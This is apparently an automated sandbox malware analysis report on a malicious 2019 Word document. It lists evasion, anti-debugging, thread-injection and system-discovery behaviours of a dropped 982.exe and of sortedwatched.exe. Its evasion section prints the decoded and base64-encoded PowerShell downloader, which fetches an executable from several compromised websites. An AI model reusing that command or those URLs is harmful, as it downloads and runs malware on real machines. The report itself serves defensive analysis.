Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\982.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\982.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\sortedwatched.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\sortedwatched.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion:

barindex
Found evasive API chain (may stop execution after checking mutex)Show sources
Source: C:\Windows\System32\sortedwatched.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_12-2912
Source: C:\Users\user\982.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_5-2961
Checks the free space of harddrivesShow sources
Source: C:\Users\user\982.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Contains functionality to enumerate running servicesShow sources
Source: C:\Users\user\982.exeCode function: EnumServicesStatusExW,GetLastError,EnumServicesStatusExW,GetTickCount,OpenServiceW,QueryServiceConfig2W,GetLastError,QueryServiceConfig2W,CloseServiceHandle,7_2_0040F504
Source: C:\Windows\System32\sortedwatched.exeCode function: EnumServicesStatusExW,GetLastError,EnumServicesStatusExW,GetTickCount,OpenServiceW,QueryServiceConfig2W,GetLastError,QueryServiceConfig2W,CloseServiceHandle,12_2_0040F504
Contains long sleeps (>= 3 min)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Enumerates the file systemShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Found evasive API chain (may stop execution after checking a module file name)Show sources
Source: C:\Users\user\982.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_4-29669
Found large amount of non-executed APIsShow sources
Source: C:\Users\user\982.exeAPI coverage: 6.9 %
Source: C:\Users\user\982.exeAPI coverage: 6.6 %
May sleep (evasive loops) to hinder dynamic analysisShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2920Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Users\user\982.exe TID: 3744Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Windows\System32\sortedwatched.exe TID: 3836Thread sleep time: -60000s >= -30000sJump to behavior
Contains functionality to query system informationShow sources
Source: C:\Users\user\982.exeCode function: 4_2_00427ECC VirtualQuery,GetSystemInfo,GetModuleHandleW,GetProcAddress,VirtualAlloc,VirtualProtect,4_2_00427ECC
Program exit pointsShow sources
Source: C:\Users\user\982.exeAPI call chain: ExitProcess graph end nodegraph_4-29872
Source: C:\Users\user\982.exeAPI call chain: ExitProcess graph end nodegraph_5-2880
Source: C:\Users\user\982.exeAPI call chain: ExitProcess graph end nodegraph_7-2847
Source: C:\Windows\System32\sortedwatched.exeAPI call chain: ExitProcess graph end nodegraph_12-2829
Source: C:\Windows\System32\sortedwatched.exeAPI call chain: ExitProcess graph end nodegraph_12-2837
Queries a list of all running processesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging:

barindex
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSystem information queried: KernelDebuggerInformationJump to behavior
Contains functionality to check if a debugger is running (IsDebuggerPresent)Show sources
Source: C:\Users\user\982.exeCode function: 4_2_0042E3B3 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_0042E3B3
Contains functionality to create guard pages, often used to hinder reverse engineering and debuggingShow sources
Source: C:\Users\user\982.exeCode function: 4_2_00427ECC VirtualProtect ?,-00000001,00000104,?4_2_00427ECC
Contains functionality to dynamically determine API callsShow sources
Source: C:\Users\user\982.exeCode function: 4_2_00432522 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,4_2_00432522
Contains functionality to read the PEBShow sources
Source: C:\Users\user\982.exeCode function: 4_2_00407F70 mov eax, dword ptr fs:[00000030h]4_2_00407F70
Source: C:\Users\user\982.exeCode function: 4_2_002C213F mov eax, dword ptr fs:[00000030h]4_2_002C213F
Source: C:\Users\user\982.exeCode function: 4_2_002C219F mov eax, dword ptr fs:[00000030h]4_2_002C219F
Source: C:\Users\user\982.exeCode function: 4_2_002C0467 mov eax, dword ptr fs:[00000030h]4_2_002C0467
Source: C:\Users\user\982.exeCode function: 4_2_002C3743 mov eax, dword ptr fs:[00000030h]4_2_002C3743
Source: C:\Users\user\982.exeCode function: 4_2_002C2C0C mov eax, dword ptr fs:[00000030h]4_2_002C2C0C
Source: C:\Users\user\982.exeCode function: 4_2_004F0E18 push dword ptr fs:[00000030h]4_2_004F0E18
Source: C:\Users\user\982.exeCode function: 4_2_00522860 mov eax, dword ptr fs:[00000030h]4_2_00522860
Source: C:\Users\user\982.exeCode function: 4_2_00522800 mov eax, dword ptr fs:[00000030h]4_2_00522800
Source: C:\Users\user\982.exeCode function: 5_2_00401E04 mov eax, dword ptr fs:[00000030h]5_2_00401E04
Source: C:\Users\user\982.exeCode function: 5_2_004012CD mov eax, dword ptr fs:[00000030h]5_2_004012CD
Source: C:\Users\user\982.exeCode function: 6_2_003E2C0C mov eax, dword ptr fs:[00000030h]6_2_003E2C0C
Source: C:\Users\user\982.exeCode function: 6_2_003E0467 mov eax, dword ptr fs:[00000030h]6_2_003E0467
Source: C:\Users\user\982.exeCode function: 6_2_003E213F mov eax, dword ptr fs:[00000030h]6_2_003E213F
Source: C:\Users\user\982.exeCode function: 6_2_003E3743 mov eax, dword ptr fs:[00000030h]6_2_003E3743
Source: C:\Users\user\982.exeCode function: 6_2_003E219F mov eax, dword ptr fs:[00000030h]6_2_003E219F
Source: C:\Users\user\982.exeCode function: 6_2_00470E18 push dword ptr fs:[00000030h]6_2_00470E18
Source: C:\Users\user\982.exeCode function: 6_2_00492860 mov eax, dword ptr fs:[00000030h]6_2_00492860
Source: C:\Users\user\982.exeCode function: 6_2_00492800 mov eax, dword ptr fs:[00000030h]6_2_00492800
Source: C:\Users\user\982.exeCode function: 7_2_00401E04 mov eax, dword ptr fs:[00000030h]7_2_00401E04
Source: C:\Users\user\982.exeCode function: 7_2_004012CD mov eax, dword ptr fs:[00000030h]7_2_004012CD
Source: C:\Users\user\982.exeCode function: 7_1_00401E04 mov eax, dword ptr fs:[00000030h]7_1_00401E04
Source: C:\Users\user\982.exeCode function: 7_1_004012CD mov eax, dword ptr fs:[00000030h]7_1_004012CD
Source: C:\Windows\System32\sortedwatched.exeCode function: 9_2_003E2C0C mov eax, dword ptr fs:[00000030h]9_2_003E2C0C
Source: C:\Windows\System32\sortedwatched.exeCode function: 9_2_003E0467 mov eax, dword ptr fs:[00000030h]9_2_003E0467
Source: C:\Windows\System32\sortedwatched.exeCode function: 9_2_003E213F mov eax, dword ptr fs:[00000030h]9_2_003E213F
Source: C:\Windows\System32\sortedwatched.exeCode function: 9_2_003E3743 mov eax, dword ptr fs:[00000030h]9_2_003E3743
Source: C:\Windows\System32\sortedwatched.exeCode function: 9_2_003E219F mov eax, dword ptr fs:[00000030h]9_2_003E219F
Source: C:\Windows\System32\sortedwatched.exeCode function: 9_2_00580E18 push dword ptr fs:[00000030h]9_2_00580E18
Source: C:\Windows\System32\sortedwatched.exeCode function: 9_2_005A2860 mov eax, dword ptr fs:[00000030h]9_2_005A2860
Source: C:\Windows\System32\sortedwatched.exeCode function: 9_2_005A2800 mov eax, dword ptr fs:[00000030h]9_2_005A2800
Source: C:\Windows\System32\sortedwatched.exeCode function: 11_2_003F0E18 push dword ptr fs:[00000030h]11_2_003F0E18
Source: C:\Windows\System32\sortedwatched.exeCode function: 11_2_004F0467 mov eax, dword ptr fs:[00000030h]11_2_004F0467
Source: C:\Windows\System32\sortedwatched.exeCode function: 11_2_004F2C0C mov eax, dword ptr fs:[00000030h]11_2_004F2C0C
Source: C:\Windows\System32\sortedwatched.exeCode function: 11_2_004F3743 mov eax, dword ptr fs:[00000030h]11_2_004F3743
Source: C:\Windows\System32\sortedwatched.exeCode function: 11_2_004F213F mov eax, dword ptr fs:[00000030h]11_2_004F213F
Source: C:\Windows\System32\sortedwatched.exeCode function: 11_2_004F219F mov eax, dword ptr fs:[00000030h]11_2_004F219F
Source: C:\Windows\System32\sortedwatched.exeCode function: 11_2_005B2860 mov eax, dword ptr fs:[00000030h]11_2_005B2860
Source: C:\Windows\System32\sortedwatched.exeCode function: 11_2_005B2800 mov eax, dword ptr fs:[00000030h]11_2_005B2800
Source: C:\Windows\System32\sortedwatched.exeCode function: 12_2_00401E04 mov eax, dword ptr fs:[00000030h]12_2_00401E04
Source: C:\Windows\System32\sortedwatched.exeCode function: 12_2_004012CD mov eax, dword ptr fs:[00000030h]12_2_004012CD
Source: C:\Windows\System32\sortedwatched.exeCode function: 12_1_00401E04 mov eax, dword ptr fs:[00000030h]12_1_00401E04
Source: C:\Windows\System32\sortedwatched.exeCode function: 12_1_004012CD mov eax, dword ptr fs:[00000030h]12_1_004012CD
Contains functionality which may be used to detect a debugger (GetProcessHeap)Show sources
Source: C:\Users\user\982.exeCode function: 4_2_004016A0 GetProcessHeap,HeapFree,4_2_004016A0
Enables debug privilegesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Contains functionality to register its own exception handlerShow sources
Source: C:\Users\user\982.exeCode function: 4_2_0042B721 SetUnhandledExceptionFilter,4_2_0042B721
Source: C:\Users\user\982.exeCode function: 4_2_0042E3B3 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_0042E3B3
Source: C:\Users\user\982.exeCode function: 4_2_0043146A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_0043146A
Source: C:\Users\user\982.exeCode function: 4_2_00427DFF IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00427DFF

HIPS / PFW / Operating System Protection Evasion:

barindex
Encrypted powershell cmdline option foundShow sources
Source: unknownProcess created: Base64 decoded $mHKwRF='JIbnvfoL';$b3aSim4_ = '982';$GvHK2M='n_vPjrp';$QziABB6L=$env:userprofile+'\'+$b3aSim4_+'.exe';$jwt7_N='Z6G6oToS';$z_nf09=.('new-'+'ob'+'ject') nEt.WebClient;$EIpSGwu='https://sabiosdelamor.co/wp-content/VtyEqoElo/@https://www.euroausili.it/wp-content/iIFSXTWmN/@https://opel.km.ua/blogs/3uju_tiowf9i-149/@https://hablabestop.live/rqbe9p/pKkLiuqGj/@https://dogongulong.vn/wp-admin/vaIDeyDj/'."sP`liT"('@');$Xn9Tjqi='W548GPbi';foreach($CiXHiW in $EIpSGwu){try{$z_nf09."d`ow`N`lOADFIle"($CiXHiW, $Qz
Maps a DLL or memory area into another processShow sources
Source: C:\Users\user\982.exeSection loaded: unknown target pid: 3668 protection: execute and read and writeJump to behavior
Modifies the context of a thread in another process (thread injection)Show sources
Source: C:\Users\user\982.exeThread register set: target process: 3668Jump to behavior
Source: C:\Users\user\982.exeThread register set: target process: 3600Jump to behavior
Source: C:\Windows\System32\sortedwatched.exeThread register set: target process: 3704Jump to behavior
Source: C:\Windows\System32\sortedwatched.exeThread register set: target process: 3780Jump to behavior
Sets debug register (to hijack the execution of another thread)Show sources
Source: C:\Users\user\982.exeThread register set: 3668 775EA4F4Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)Show sources
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -encod JABtAEgASwB3AFIARgA9ACcASgBJAGIAbgB2AGYAbwBMACcAOwAkAGIAMwBhAFMAaQBtADQAXwAgAD0AIAAnADkAOAAyACcAOwAkAEcAdgBIAEsAMgBNAD0AJwBuAF8AdgBQAGoAcgBwACcAOwAkAFEAegBpAEEAQgBCADYATAA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAYgAzAGEAUwBpAG0ANABfACsAJwAuAGUAeABlACcAOwAkAGoAdwB0ADcAXwBOAD0AJwBaADYARwA2AG8AVABvAFMAJwA7ACQAegBfAG4AZgAwADkAPQAuACgAJwBuAGUAdwAtACcAKwAnAG8AYgAnACsAJwBqAGUAYwB0ACcAKQAgAG4ARQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAEUASQBwAFMARwB3AHUAPQAnAGgAdAB0AHAAcwA6AC8ALwBzAGEAYgBpAG8AcwBkAGUAbABhAG0AbwByAC4AYwBvAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAFYAdAB5AEUAcQBvAEUAbABvAC8AQABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBlAHUAcgBvAGEAdQBzAGkAbABpAC4AaQB0AC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAGkASQBGAFMAWABUAFcAbQBOAC8AQABoAHQAdABwAHMAOgAvAC8AbwBwAGUAbAAuAGsAbQAuAHUAYQAvAGIAbABvAGcAcwAvADMAdQBqAHUAXwB0AGkAbwB3AGYAOQBpAC0AMQA0ADkALwBAAGgAdAB0AHAAcwA6AC8ALwBoAGEAYgBsAGEAYgBlAHMAdABvAHAALgBsAGkAdgBlAC8AcgBxAGIAZQA5AHAALwBwAEsAawBMAGkAdQBxAEcAagAvA

Language, Device and Operating System Detection:

barindex
Contains functionality locales information (e.g. system language)Show sources
Source: C:\Users\user\982.exeCode function: GetLocaleInfoA,4_2_00435022
Source: C:\Users\user\982.exeCode function: GetLocaleInfoW,__snwprintf_s,LoadLibraryW,4_2_0041CEDC
Contains functionality to query CPU information (cpuid)Show sources
Source: C:\Users\user\982.exeCode function: 4_2_004093C0 cpuid 4_2_004093C0
Queries the volume information (name, serial number etc) of a deviceShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Users\user\982.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\sortedwatched.exeQueries volume information: C:\ VolumeInformationJump to behavior
Contains functionality to query local / system timeShow sources
Source: C:\Users\user\982.exeCode function: 4_2_0042C660 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,RtlQueryPerformanceCounter,4_2_0042C660
Contains functionality to query windows versionShow sources
Source: C:\Users\user\982.exeCode function: 4_2_0040B793 _memset,GetVersionExA,4_2_0040B793
Queries the cryptographic machine GUIDShow sources
Source: C:\Users\user\982.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Sample Distance (10 = nearest)
10 9 8 7 6 5 4 3 2 1
Samplename Analysis ID SHA256 Similarity

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 961422 Sample: Nuovo_documento_2019.09.20.doc Startdate: 20/09/2019 Architecture: WINDOWS Score: 100 47 Antivirus or Machine Learning detection for sample 2->47 49 Multi AV Scanner detection for submitted file 2->49 51 Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) 2->51 53 3 other signatures 2->53 9 powershell.exe 12 7 2->9         started        14 sortedwatched.exe 36 2->14         started        16 WINWORD.EXE